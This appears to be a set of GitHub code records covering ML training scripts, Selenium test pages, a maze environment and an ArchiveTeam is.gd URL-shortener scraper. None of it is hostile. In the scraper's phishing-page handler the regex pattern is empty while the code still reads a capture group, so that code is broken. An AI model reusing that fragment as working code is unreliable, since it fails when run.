r['class_ids'],\r\n test_set.class_names, r['scores'],\r\n title=\"Predictions\")\r\n","repo_name":"omerfarukkkoc/Mask_R-CNN","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38620643141","text":"import torch\nimport argparse\nimport os\n\nimport model \nimport utils\n\nfrom torch.utils.data import DataLoader\nfrom data import PolyphonicDataset \n\n# CUDA reset\ntorch.cuda.empty_cache()\n\n# Learning hyperparameters\nmax_epochs = 3500\nlearning_rate = 1e-4\n\n# Setup GPU stuff\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nprint('Using',device)\n\n# Parse args\nparser = argparse.ArgumentParser(description='Train model.')\nparser.add_argument('-corpus', dest='corpus', type=str, required=True, help='Path to the corpus.')\nparser.add_argument('-voc_p', dest='voc_p', type=str, required=True, help='Path to the pitch vocabulary file.')\nparser.add_argument('-voc_r', dest='voc_r', type=str, required=False, help='Path to the rhythm vocabulary file.')\nparser.add_argument('-l', dest='load', type=str, required=False, help='Path to saved model to load from')\nargs = parser.parse_args()\n\n# Load model architecture parameters\nparams = model.default_model_params()\n\n# Load datasets\ndataset_train = PolyphonicDataset(params, args.corpus, 'train', args.voc_p, args.voc_r)\ndataset_valid = PolyphonicDataset(params, args.corpus, 'valid', args.voc_p, args.voc_r)\ndataloader_train = DataLoader(dataset_train, batch_size=1, shuffle=True)\ndataloader_valid = DataLoader(dataset_valid, batch_size=1, shuffle=True)\n\n# Get blank idx values for CTC\nBLANK_VAL_NOTE = dataset_train.vocab_size_note\nBLANK_VAL_LENGTH = dataset_train.vocab_size_length\n\n# Model/optimizer creation\nnn_model = model.Baseline(params, BLANK_VAL_NOTE, BLANK_VAL_LENGTH)\nnn_model.to(device)\noptimizer = torch.optim.Adam(nn_model.parameters(), lr=learning_rate)\n\n# Initialize weights\ndef init_weights(m):\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, 
torch.nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight)\n m.bias.data.fill_(0)\nnn_model.apply(init_weights)\n\n# Load previous model if flag used\nif args.load:\n state_dict = torch.load(args.load)\n nn_model.load_state_dict(state_dict['model'])\n optimizer.load_state_dict(state_dict['optimizer'])\n print('Model loaded!', args.load)\nmodel_num = 1\n\n# Function to save model\ndef save_model():\n\n # Save model\n root_model_path = 'models/latest_model' + str(model_num) + '.pt'\n model_dict = nn_model.state_dict()\n state_dict = {'model': model_dict, 'optimizer': optimizer.state_dict()}\n torch.save(state_dict, root_model_path)\n\n print('Saved model')\n\n# Training loop\nfor epoch in range(max_epochs):\n\n print('Epoch %d...' % epoch)\n\n train_loss = 0\n\n # Training stats\n train_greedy_val_ed_note = 0 # sum of edit dist for note\n train_greedy_val_ed_len = 0 # sum of edit dist for length\n train_greedy_val_len = 0 # sum of target lengths\n train_greedy_num_correct_note = 0\n train_greedy_num_correct_len = 0\n train_greedy_num_samples = 0\n\n # Go through training data\n nn_model.train()\n for batch_num, batch in enumerate(dataloader_train):\n\n # Reset gradient\n optimizer.zero_grad()\n\n # Forward pass (try/except for large batches that may exceed GPU memory capacity)\n try:\n pitch_out, length_out = nn_model(batch['inputs'][0].to(device))\n except RuntimeError:\n print('Out of memory CUDA')\n continue\n out_lengths = batch['seq_lengths']\n\n # Get targets\n pitch_targets, length_targets = batch['targets']\n target_lengths = torch.zeros(len(pitch_targets), dtype=torch.int32)\n\n # Pad targets and get target lengths\n max_len_target = 0\n for t in pitch_targets:\n max_len_target = max(max_len_target, len(t))\n for i in range(len(pitch_targets)):\n target_lengths[i] = len(pitch_targets[i])\n while len(pitch_targets[i]) < max_len_target:\n pitch_targets[i].append(BLANK_VAL_NOTE)\n length_targets[i].append(BLANK_VAL_LENGTH)\n\n # Convert targets from python list to tensor\n pitch_targets = torch.tensor(pitch_targets)\n length_targets = torch.tensor(length_targets)\n \n # Backward pass and update weights\n length_loss = torch.nn.CTCLoss(blank=BLANK_VAL_LENGTH, zero_infinity=True)\n pitch_loss = torch.nn.CTCLoss(blank=BLANK_VAL_NOTE, zero_infinity=True)\n\n # Calculate CTC loss\n loss = length_loss(length_out, length_targets, out_lengths.clone().detach(), target_lengths) + \\\n pitch_loss(pitch_out, pitch_targets, out_lengths.clone().detach(), target_lengths)\n\n # Update weights\n loss.backward() \n optimizer.step()\n\n train_loss += loss.item()\n\n # Decode model output to get length/pitch prediction\n '''\n greedy_preds_len = utils.greedy_decode(length_out, out_lengths[0])\n greedy_preds_pitch = utils.greedy_decode(pitch_out, out_lengths[0])\n\n # Calculate SER and Sequence Accuracy (greedy decode) - LENGTH\n for i,pred in enumerate(greedy_preds_len):\n ed = utils.edit_distance(pred, length_targets[i][:target_lengths[i]].tolist())\n train_greedy_val_ed_len += ed\n train_greedy_val_len += target_lengths[i]\n train_greedy_num_correct_len += int(ed == 0)\n train_greedy_num_samples += 1\n '''\n\n # Show training loss every 500 batches\n if (batch_num) % 500 == 0:\n if batch_num == 0:\n print ('Training loss value at batch %d: %f' % ((batch_num),train_loss))\n else:\n print ('Training loss value at batch %d: %f' % ((batch_num),train_loss/500))\n train_loss = 0 \n\n # Save model every 1500 batches\n if (batch_num+1) % 1500 == 0:\n save_model() \n model_num += 1\n\n # Print training epoch 
stats\n img_name = batch['names'][0]\n #print('Train - Greedy SER at epoch %d: %f' % ((epoch+1), train_greedy_val_ed_len/train_greedy_val_len))\n #print('Train - Greedy sequence error rate at epoch %d: %f' % ((epoch+1), (train_greedy_num_samples-train_greedy_num_correct_len)/train_greedy_num_samples))\n #print('Train - Greedy (', img_name, '):', greedy_preds_len[0])\n\n # Validation statistics\n valid_loss = 0 \n greedy_val_ed_note = 0 # sum of edit dist for pitch\n greedy_val_ed_len = 0 # sum of edit dist for rhythm\n greedy_val_len = 0 # sum of target sequence lenghts\n greedy_num_correct_note = 0 # sum of completely correct pitch sequence predictions\n greedy_num_correct_len = 0 # sum of completely correct rhythm sequence predictions\n greedy_num_samples = 0 # number of samples evaluated\n \n # Go through validation data\n nn_model.eval()\n for batch_num, batch in enumerate(dataloader_valid):\n\n with torch.no_grad():\n\n # Forward pass\n pitch_out, length_out = nn_model(batch['inputs'][0].to(device))\n out_lengths = batch['seq_lengths']\n\n # Get targets\n pitch_targets, length_targets = batch['targets']\n target_lengths = torch.zeros(len(pitch_targets), dtype=torch.int32)\n\n # Pad targets and get target lengths\n max_len_target = 0\n for t in pitch_targets:\n max_len_target = max(max_len_target, len(t))\n for i in range(len(pitch_targets)):\n target_lengths[i] = len(pitch_targets[i])\n while len(pitch_targets[i]) < max_len_target:\n pitch_targets[i].append(BLANK_VAL_NOTE)\n length_targets[i].append(BLANK_VAL_LENGTH)\n\n # Convert python list to tensor\n pitch_targets = torch.tensor(pitch_targets)\n length_targets = torch.tensor(length_targets)\n\n # Calculate validation loss\n length_loss = torch.nn.CTCLoss(blank=BLANK_VAL_LENGTH, zero_infinity=True)\n pitch_loss = torch.nn.CTCLoss(blank=BLANK_VAL_NOTE, zero_infinity=True)\n loss = length_loss(length_out, length_targets, out_lengths.clone().detach()[0], target_lengths) + \\\n pitch_loss(pitch_out, pitch_targets, out_lengths.clone().detach()[0], target_lengths)\n\n valid_loss += loss.item()\n\n '''\n # Decode the model output to its prediction (greedy search) - LENGTH\n greedy_preds_len = utils.greedy_decode(length_out, out_lengths[0])\n\n # Calculate SER and Sequence Accuracy (greedy decode) - RHYTHM\n for i,pred in enumerate(greedy_preds_len):\n ed = utils.edit_distance(pred, length_targets[i][:target_lengths[i]].tolist())\n greedy_val_ed_len += ed\n greedy_val_len += target_lengths[i]\n greedy_num_correct_len += int(ed == 0)\n greedy_num_samples += 1\n\n # Decode the model output to its prediction (greedy search) - PITCH\n greedy_preds_note = utils.greedy_decode(pitch_out, out_lengths[0])\n\n # Calculate SER and Sequence Accuracy (greedy decode) - RHYTHM\n for i,pred in enumerate(greedy_preds_note):\n ed = utils.edit_distance(pred, pitch_targets[i][:target_lengths[i]].tolist())\n greedy_val_ed_note += ed\n greedy_num_correct_note += int(ed == 0)\n '''\n\n img_name = batch['names'][0]\n\n # Print validation stats\n print('Validation loss value at epoch %d: %f' % ((epoch+1),valid_loss/len(dataloader_valid)))\n\n '''\n print('LENGTH - Greedy SER at epoch %d: %f' % ((epoch+1), greedy_val_ed_len/greedy_val_len))\n print('LENGTH - Greedy sequence error rate at epoch %d: %f' % ((epoch+1), (greedy_num_samples-greedy_num_correct_len)/greedy_num_samples))\n print('LENGTH - Greedy Validation (', img_name, '):', greedy_preds_len[0])\n\n print('PITCH - Greedy SER at epoch %d: %f' % ((epoch+1), greedy_val_ed_note/greedy_val_len))\n print('PITCH 
- Greedy sequence error rate at epoch %d: %f' % ((epoch+1), (greedy_num_samples-greedy_num_correct_note)/greedy_num_samples))\n print('PITCH - Greedy Validation (', img_name, '):', greedy_preds_note[0])\n '''\n\n #if (epoch + 1) % 50 == 0:\n save_model() \n model_num += 1","repo_name":"sachindae/polyphonic-omr","sub_path":"experiment_code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"43187647128","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nimport allure\n\nfrom locators.main_page_locators import MainPageLocators\nfrom locators.register_form_locators import RegisterFormLocators\nfrom locators.rent_page_locators import RentPageLocators\nfrom locators.check_status_locators import CheckStatusLocators\n\nclass RentPage:\n\n # конструктор класса\n def __init__(self, driver, data_base):\n self.driver = driver\n self.data_base = data_base\n\n\n # действия c элементами\n\n @allure.step(\"Ожидание загрузки окна\")\n def rent_window_loaded(self):\n WebDriverWait(self.driver, 10).until(expected_conditions.visibility_of_element_located((RentPageLocators.RENT_FORM_ORDER_BUTTON)))\n\n @allure.step(\"Выбор даты доставки в текущем месяце\")\n def choose_delivery_date_this_month(self):\n self.driver.find_element(*RentPageLocators.INPUT_DELIVERY_DATE_RENT_FORM).click()\n self.driver.find_element(*RentPageLocators.CHOOSE_DELIVERY_DATE_THIS_MONTH_RENT_FORM).click()\n\n @allure.step(\"Выбор даты доставки в след месяце\")\n def choose_delivery_date_next_month(self):\n self.driver.find_element(*RentPageLocators.INPUT_DELIVERY_DATE_RENT_FORM).click()\n self.driver.find_element(*RentPageLocators.CHANGE_MONTH_BUTTON).click()\n self.driver.find_element(*RentPageLocators.CHOOSE_DELIVERY_DATE_NEXT_MONTH_RENT_FORM).click()\n\n @allure.step(\"Выбор срока аренды 'сутки'\")\n def choose_rent_period_1day(self):\n self.driver.find_element(*RentPageLocators.CHOOSE_ARROW_DURATION_RENT_FORM).click()\n self.driver.find_element(*RentPageLocators.CHOOSE_DURATION_1DAY_RENT_FORM).click()\n\n @allure.step(\"Выбор срока аренды 7 дней\")\n def choose_rent_period_7days(self):\n self.driver.find_element(*RentPageLocators.CHOOSE_ARROW_DURATION_RENT_FORM).click()\n elem = self.driver.find_element(*RentPageLocators.CHOOSE_DURATION_7DAYS_RENT_FORM)\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", elem)\n self.driver.find_element(*RentPageLocators.CHOOSE_DURATION_7DAYS_RENT_FORM).click()\n\n @allure.step(\"Выбор черного цвета самоката\")\n def choose_black_color(self):\n self.driver.find_element(*RentPageLocators.CHECKBOX_BLACK_COLOR_RENT_FORM).click()\n\n @allure.step(\"Выбор серого цвета самоката\")\n def choose_grey_color(self):\n self.driver.find_element(*RentPageLocators.CHECKBOX_GREY_COLOR_RENT_FORM).click()\n\n @allure.step(\"Ввeдeние текста в поле 'комментарий курьеру'\")\n def input_comment(self, comment):\n self.driver.find_element(*RentPageLocators.INPUT_COMMENT_RENT_FORM).send_keys(comment)\n\n @allure.step(\"Клик по кнопке 'Заказать'\")\n def click_order_button(self):\n self.driver.find_element(*RentPageLocators.RENT_FORM_ORDER_BUTTON).click()\n\n @allure.step(\"Клик на кнопку 'Да' в окне 
подтверждения\")\r\n    def click_yes_button_confirm_window(self):\r\n        WebDriverWait(self.driver, 10).until(expected_conditions.visibility_of_element_located((RentPageLocators.POP_UP_CONFIRM_WINDOW)))\r\n        self.driver.find_element(*RentPageLocators.YES_BUTTON_CONFIRM_ORDER_WINDOW).click()\r\n        WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable((RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW)))\r\n\r\n    @allure.step(\"Проверка оформлен ли заказ\")\r\n    def check_order_status(self):\r\n        window = expected_conditions.visibility_of_element_located((RentPageLocators.POP_UP_INFO_ORDER_CONFIRMED_WINDOW))\r\n        button = expected_conditions.element_to_be_clickable((RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW))\r\n        return window and button\r\n\r\n    @allure.step(\"Ожидание загрузки всплывающего окна\")\r\n    def wait_order_status(self):\r\n        WebDriverWait(self.driver, 10).until(expected_conditions.visibility_of_element_located((RentPageLocators.POP_UP_INFO_ORDER_CONFIRMED_WINDOW)))\r\n        WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable((RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW)))\r\n\r\n    @allure.step(\"Оформление заказа на серый самокат с доставкой в этом месяце, сроком аренды 1 день и пустым полем 'комментарий'\")\r\n    def order_grey_scooter_using_header_order_button(self, data):\r\n        self.choose_delivery_date_this_month()\r\n        self.choose_rent_period_1day()\r\n        self.choose_grey_color()\r\n        self.click_order_button()\r\n        self.click_yes_button_confirm_window()\r\n\r\n    @allure.step(\"Оформление заказа на черный самокат с доставкой в след.месяце, сроком аренды 7 дней и всеми заполненными полями\")\r\n    def order_black_scooter_using_footer_order_button(self, data):\r\n        self.choose_delivery_date_next_month()\r\n        self.choose_rent_period_7days()\r\n        self.choose_black_color()\r\n        self.input_comment(data.get('comment'))\r\n        self.click_order_button()\r\n        self.click_yes_button_confirm_window()\r\n\r\n    @allure.step(\"Переход на страницу статуса заказа\")\r\n    def go_to_check_status_page(self):\r\n        WebDriverWait(self.driver, 30).until(expected_conditions.element_to_be_clickable((RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW)))\r\n        self.driver.find_element(*RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW).click()\r\n        WebDriverWait(self.driver, 30).until(expected_conditions.visibility_of_element_located((CheckStatusLocators.DATA_FIELD)))\r\n        elem = self.driver.find_element(*CheckStatusLocators.BUTTON_CANCEL_ORDER_STATUS_PAGE)\r\n        self.driver.execute_script(\"arguments[0].scrollIntoView();\", elem)\r\n        WebDriverWait(self.driver, 30).until(expected_conditions.element_to_be_clickable((CheckStatusLocators.BUTTON_CANCEL_ORDER_STATUS_PAGE)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"irinadamoon/ya_p_scooter","sub_path":"pages/rent_page.py","file_name":"rent_page.py","file_ext":"py","file_size_in_byte":6490,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"32740424330","text":"# encoding=utf-8\nfrom __future__ import unicode_literals\n\nimport re\nimport time\n\nfrom terroroftinytown.client import errors\nfrom terroroftinytown.client.errors import PleaseRetry\nfrom terroroftinytown.services.base import BaseService\nfrom terroroftinytown.services.rand import HashRandMixin\nfrom terroroftinytown.services.status import URLStatus\nfrom terroroftinytown.six.moves import html_parser\n\n\n# __all__ = ['IsgdService']\nclass IsgdService(BaseService):\n    # NOTE: VgdService inherits from this class!\n\n    # unavailable status code: 200 410\n    # banned status code: 
502\n\n    def __init__(self, *args, **kwargs):\n        BaseService.__init__(self, *args, **kwargs)\n        self._processing_phishing_page = False\n\n    def scrape_one(self, sequence_number):\n        self._processing_phishing_page = False\n        return BaseService.scrape_one(self, sequence_number)\n\n    def process_unavailable(self, response):\n        if not response.text:\n            return (URLStatus.unavailable, None, None)\n\n        # Catch both types encountered in the wild:\n        # <div id=\"main\"><p>Rate limit exceeded - you must wait at least 1798 seconds before we'll service this request.</p></div>\n        # <div id=\"main\"><p>Rate limit exceeded - please wait 1 minute before accessing more shortened URLs</p></div>\n        if '<div id=\"main\"><p>Rate limit exceeded - ' in response.text:\n            raise PleaseRetry()\n\n        if \"<p>Link Disabled</p>\" in response.text:\n            return self.parse_blocked(response)\n        if \"<p>The full original link is shown below. Click the link if you'd like to proceed to the destination shown:\" in response.text:\n            return self.parse_preview(response)\n        if 'Suspected phishing site | CloudFlare' in response.text:\n            return self.process_phishing(response)\n\n        raise errors.UnexpectedNoResult(\"Could not find processing unavailable for %s\" % self.current_shortcode)\n\n    def parse_blocked(self, response):\n        response.encoding = 'utf-8'\n\n        match = re.search(\"<p>For reference and to help those fighting spam the original destination of this URL is given below \\\(we strongly recommend you don't visit it since it may damage your PC\\\): -<br>(.*)</p><h2>is\\\.gd</h2><p>is\\\.gd is a free service used to shorten long URLs\\\.\", response.text)\n        if not match:\n            raise errors.UnexpectedNoResult(\"Could not find target URL in 'Link Disabled' page\")\n\n        url = match.group(1)\n        url = html_parser.HTMLParser().unescape(url)\n        if url == \"\":\n            return (URLStatus.unavailable, None, None)\n        return (URLStatus.ok, url, response.encoding)\n\n    def parse_preview(self, response):\n        response.encoding = 'utf-8'\n\n        match = re.search(\"Click the link if you'd like to proceed to the destination shown: -<br>(.*)
\", response.text)\n if not match:\n raise errors.UnexpectedNoResult(\"Could not find target URL in 'Preview' page\")\n\n url = match.group(1)\n return (URLStatus.ok, html_parser.HTMLParser().unescape(url), response.encoding)\n \n def process_phishing(self, response):\n if self._processing_phishing_page:\n raise errors.UnexpectedNoResult(\"Alreadying processing phishing page for %s\" % self.current_shortcode)\n \n self._processing_phishing_page = True\n time.sleep(1)\n \n match = re.search(r'', response.text)\n \n url = 'https://is.gd/cdn-cgi/phish-bypass?u=/{0}&atok={1}'.format(\n self.current_shortcode, match.group(1))\n \n response = self.fetch_url(url)\n return self.process_response(response)\n\n\nclass Isgd6Service(HashRandMixin, IsgdService):\n def get_shortcode_width(self):\n return 6\n","repo_name":"ArchiveTeam/terroroftinytown","sub_path":"terroroftinytown/services/isgd.py","file_name":"isgd.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"48"} +{"seq_id":"6467611141","text":"from pyglfw.glfw import *\nimport vectormath\nfrom OpenGL.GLU import gluLookAt\nfrom math import atan2, pi\nfrom sound import sounds\n\nclass Camera: \n def __init__(self, x0, y0, z0, angleA0, angleB0): \n self.setCameraView(x0, y0, z0, angleA0, angleB0)\n self.target = None\n self.oldTargetPos = None\n self.delta = 10\n \n def setTarget(self, target):\n self.target = target\n def setCameraView(self, x, y, z, angleX, angleY): \n self.x = x \n self.y = y \n self.z = z \n self.angleX = angleX \n self.angleY = angleY \n\n def applyInputs(self, performance): \n moveSpeed = 5\n turnSpeed = 100\n mouseSPEEDmultiplier = 0.4\n deltaY = 0\n deltaX = 0\n\n if glfwGetKey(GLFW_KEY_UP):\n deltaX = +moveSpeed * performance \n if glfwGetKey(GLFW_KEY_DOWN): \n deltaX = -moveSpeed * performance \n if glfwGetKey(GLFW_KEY_LEFT): \n deltaY = -moveSpeed * performance \n if glfwGetKey(GLFW_KEY_RIGHT): \n deltaY = +moveSpeed * performance\n self.x += deltaX\n self.z += deltaY\n def draw(self):\n #set listener position at camera\n sounds.setListenerPosition((self.x, self.y, self.z))\n\n #target coord\n tx, ty, tz = self.target.body.getPosition()\n\n if self.oldTargetPos==None:\n self.oldTargetPos = tx, ty, tz\n \n gluLookAt(self.x, self.y, self.z, (tx+self.oldTargetPos[0])/2, (self.y+self.oldTargetPos[1])/2/3, (tz+self.oldTargetPos[2])/2, 0, 1, 0)\n self.oldTargetPos = tx, ty, tz\n\n v = vectormath.getVector((self.x, 0.0, self.z), (tx, 0.0, tz))\n self.angleY = -(atan2(v[2], v[0]) + pi/2)*180.0/pi","repo_name":"mmozeiko/Squares3D-prototype","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30480108647","text":"\"\"\"\nAdopted from https://github.com/ziatdinovmax/atomai by Maxim Ziatdinov (maxim.ziatdinov@ai4microscopy.com)\n\"\"\"\n\nfrom typing import List, Union, Type\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom blocks import ConvBlock, ResModule, UpsampleBlock\n\n\nclass SegResNet(nn.Module):\n '''\n Builds a fully convolutional neural network based on residual blocks\n for semantic segmentation\n Args:\n nb_classes:\n Number of classes in the ground truth\n nb_filters:\n Number of filters in 1st residual block\n (gets multiplied by 2 in each next block)\n batch_norm:\n Use batch normalization after each convolutional layer\n (Default: True)\n upsampling_mode:\n 
Select between \"bilinear\" or \"nearest\" upsampling method.\n Bilinear is usually more accurate,but adds additional (small)\n randomness. For full reproducibility, consider using 'nearest'\n (this assumes that all other sources of randomness are fixed)\n **layers (list):\n 3-element list with a number of residual blocks\n in each residual segment (Default: [2, 2])\n '''\n def __init__(self,\n nb_classes: int = 1,\n nb_filters: int = 32,\n batch_norm: bool = True,\n upsampling_mode: str = \"bilinear\",\n **kwargs: List[int]\n ) -> None:\n '''\n Initializes module parameters\n '''\n super(SegResNet, self).__init__()\n nbl = kwargs.get(\"layers\", [2, 2, 2])\n self.c1 = ConvBlock(\n 2, 1, 1, nb_filters, batch_norm=batch_norm\n )\n self.c2 = ResModule(\n 2, nbl[0], nb_filters, nb_filters*2, batch_norm=batch_norm\n )\n self.bn = ResModule(\n 2, nbl[1], nb_filters*2, nb_filters*4, batch_norm=batch_norm\n )\n self.upsample_block1 = UpsampleBlock(\n 2, nb_filters*4, nb_filters*2, 2, upsampling_mode\n )\n self.c3 = ResModule(\n 2, nbl[2], nb_filters*4, nb_filters*2, batch_norm=batch_norm\n )\n self.upsample_block2 = UpsampleBlock(\n 2, nb_filters*2, nb_filters, 2, upsampling_mode\n )\n self.c4 = ConvBlock(\n 2, 1, nb_filters*2, nb_filters, batch_norm=batch_norm\n )\n self.px = nn.Conv2d(nb_filters, nb_classes, 1, 1, 0)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n '''Defines a forward pass'''\n # Contracting path\n c1 = self.c1(x)\n d1 = F.max_pool2d(c1, kernel_size=2, stride=2)\n c2 = self.c2(d1)\n d2 = F.max_pool2d(c2, kernel_size=2, stride=2)\n # Bottleneck\n bn = self.bn(d2)\n # Expanding path\n u2 = self.upsample_block1(bn)\n u2 = torch.cat([c2, u2], dim=1)\n u2 = self.c3(u2)\n u1 = self.upsample_block2(u2)\n u1 = torch.cat([c1, u1], dim=1)\n u1 = self.c4(u1)\n # pixel-wise classification\n px = self.px(u1)\n return px","repo_name":"navn1/atomfinder_skunkworks","sub_path":"model/fcn.py","file_name":"fcn.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39545675100","text":"class MazeEnvironment:\n def __init__(self, maze: list):\n '''\n Initialization of the Maze Environment\n -------------\n maze : list\n List of list of c (clear) or w (wall) that represent the maze\n '''\n self.maze = maze\n self.num_rows = len(maze)\n self.num_columns = len(maze[0])\n\n # Available actions\n self.actions = ['up', 'down', 'left', 'right']\n\n # Status\n self.current = None\n self.previous = None\n\n self.terminal_state = (self.num_rows - 1, self.maze[-1].index('c'))\n\n def reset(self):\n '''\n Set state in the initial position.\n '''\n self.current = (0, 1) # Row 0, Column 1\n self.previous = None\n\n def step(self, action: str):\n \"\"\"\n Performs a movement in the environment and gets the new State and Reward\n ------------\n action : str\n One of the following actions: up, down, left, right\n \"\"\"\n self.current = self.move(action)\n\n return self.current, self.get_reward(), self.is_terminal_state()\n\n def move(self, action: str):\n \"\"\"\n Calculates the new State given a current State and an Action\n -----------\n action: str\n One of the following actions: up, down, left, right\n \"\"\"\n self.previous = self.current\n\n if action not in self.actions:\n raise Exception(f\"'{action}' is not a valid action!\")\n\n row = self.current[0]\n column = self.current[1]\n\n if action == 'up':\n return self.current if self.is_wall(row - 1, column) else (row - 1, column)\n elif action == 
'down':\n return self.current if self.is_wall(row + 1, column) else (row + 1, column)\n elif action == 'left':\n return self.current if self.is_wall(row, column - 1) else (row, column - 1)\n elif action == 'right':\n return self.current if self.is_wall(row, column + 1) else (row, column + 1)\n\n def is_wall(self, row: int, column: int):\n '''\n Returns if the specific row, column is a wall of the Maze\n '''\n return self.maze[row][column] == 'w'\n\n def get_reward(self):\n \"\"\"\n Gets Reward of the last movement\n \"\"\"\n if self.is_terminal_state():\n return 500\n\n # Returns -2 if the movement was over a Wall, -1 in all other cases\n return -2 if self.previous == self.current else -1\n\n def is_terminal_state(self):\n '''\n If the State is in the last row, that means that is is in the exit\n '''\n return self.current[0] == self.num_rows - 1\n\n def set_state(self, row: int, column: int):\n \"\"\"\n Forces change to a specific state\n \"\"\"\n if not self.is_wall(row, column):\n self.current = (row, column)\n","repo_name":"juanmadlg/Generalized-Policy-Iteration","sub_path":"generalized_pollicy_iteration/maze_environment.py","file_name":"maze_environment.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44814491946","text":"import glob as gb\nimport pandas as pd \n\n#Collect the Comments files in a list to parse\ncommentsFile = \"posts*\" #the string that all comments.pk files contain\nfileList = [] #the list where we will store the comments.pk files\n\nfor file in gb.glob(commentsFile): #compile a list of all the comments.pk files\n\tfileList.append(file)\n\ndf = pd.concat([pd.read_pickle(file) for file in fileList], axis=0) #concatenate all comments files into one comment file\ndf.to_pickle('./allposts.pk') ","repo_name":"kennymuli/Reddit","sub_path":"concatenate.py","file_name":"concatenate.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31308539880","text":"import pytest\n\nimport numpy as np\n\nfrom mlagents.trainers.ghost.trainer import GhostTrainer\nfrom mlagents.trainers.ghost.controller import GhostController\nfrom mlagents.trainers.behavior_id_utils import BehaviorIdentifiers\nfrom mlagents.trainers.ppo.trainer import PPOTrainer\nfrom mlagents.trainers.agent_processor import AgentManagerQueue\nfrom mlagents.trainers.buffer import BufferKey, RewardSignalUtil\nfrom mlagents.trainers.tests import mock_brain as mb\nfrom mlagents.trainers.tests.mock_brain import copy_buffer_fields\nfrom mlagents.trainers.tests.test_trajectory import make_fake_trajectory\nfrom mlagents.trainers.settings import TrainerSettings, SelfPlaySettings\nfrom mlagents.trainers.tests.dummy_config import create_observation_specs_with_shapes\n\n\n@pytest.fixture\ndef dummy_config():\n return TrainerSettings(self_play=SelfPlaySettings())\n\n\nVECTOR_ACTION_SPACE = 1\nVECTOR_OBS_SPACE = 8\nDISCRETE_ACTION_SPACE = [3, 3, 3, 2]\nBUFFER_INIT_SAMPLES = 10241\nNUM_AGENTS = 12\n\n\n@pytest.mark.parametrize(\"use_discrete\", [True, False])\ndef test_load_and_set(dummy_config, use_discrete):\n mock_specs = mb.setup_test_behavior_specs(\n use_discrete,\n False,\n vector_action_space=DISCRETE_ACTION_SPACE\n if use_discrete\n else VECTOR_ACTION_SPACE,\n vector_obs_space=VECTOR_OBS_SPACE,\n )\n\n trainer_params = dummy_config\n trainer = PPOTrainer(\"test\", 0, trainer_params, True, False, 0, \"0\")\n trainer.seed = 
1\n policy = trainer.create_policy(\"test\", mock_specs)\n trainer.seed = 20 # otherwise graphs are the same\n to_load_policy = trainer.create_policy(\"test\", mock_specs)\n\n weights = policy.get_weights()\n load_weights = to_load_policy.get_weights()\n try:\n for w, lw in zip(weights, load_weights):\n np.testing.assert_array_equal(w, lw)\n except AssertionError:\n pass\n\n to_load_policy.load_weights(weights)\n load_weights = to_load_policy.get_weights()\n\n for w, lw in zip(weights, load_weights):\n np.testing.assert_array_equal(w, lw)\n\n\ndef test_resume(dummy_config, tmp_path):\n mock_specs = mb.setup_test_behavior_specs(\n True, False, vector_action_space=[2], vector_obs_space=1\n )\n behavior_id_team0 = \"test_brain?team=0\"\n behavior_id_team1 = \"test_brain?team=1\"\n brain_name = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0).brain_name\n tmp_path = tmp_path.as_posix()\n ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, tmp_path)\n controller = GhostController(100)\n trainer = GhostTrainer(\n ppo_trainer, brain_name, controller, 0, dummy_config, True, tmp_path\n )\n\n parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0)\n policy = trainer.create_policy(parsed_behavior_id0, mock_specs)\n trainer.add_policy(parsed_behavior_id0, policy)\n\n parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team1)\n policy = trainer.create_policy(parsed_behavior_id1, mock_specs)\n trainer.add_policy(parsed_behavior_id1, policy)\n\n trainer.save_model()\n\n # Make a new trainer, check that the policies are the same\n ppo_trainer2 = PPOTrainer(brain_name, 0, dummy_config, True, True, 0, tmp_path)\n trainer2 = GhostTrainer(\n ppo_trainer2, brain_name, controller, 0, dummy_config, True, tmp_path\n )\n policy = trainer2.create_policy(parsed_behavior_id0, mock_specs)\n trainer2.add_policy(parsed_behavior_id0, policy)\n\n policy = trainer2.create_policy(parsed_behavior_id1, mock_specs)\n 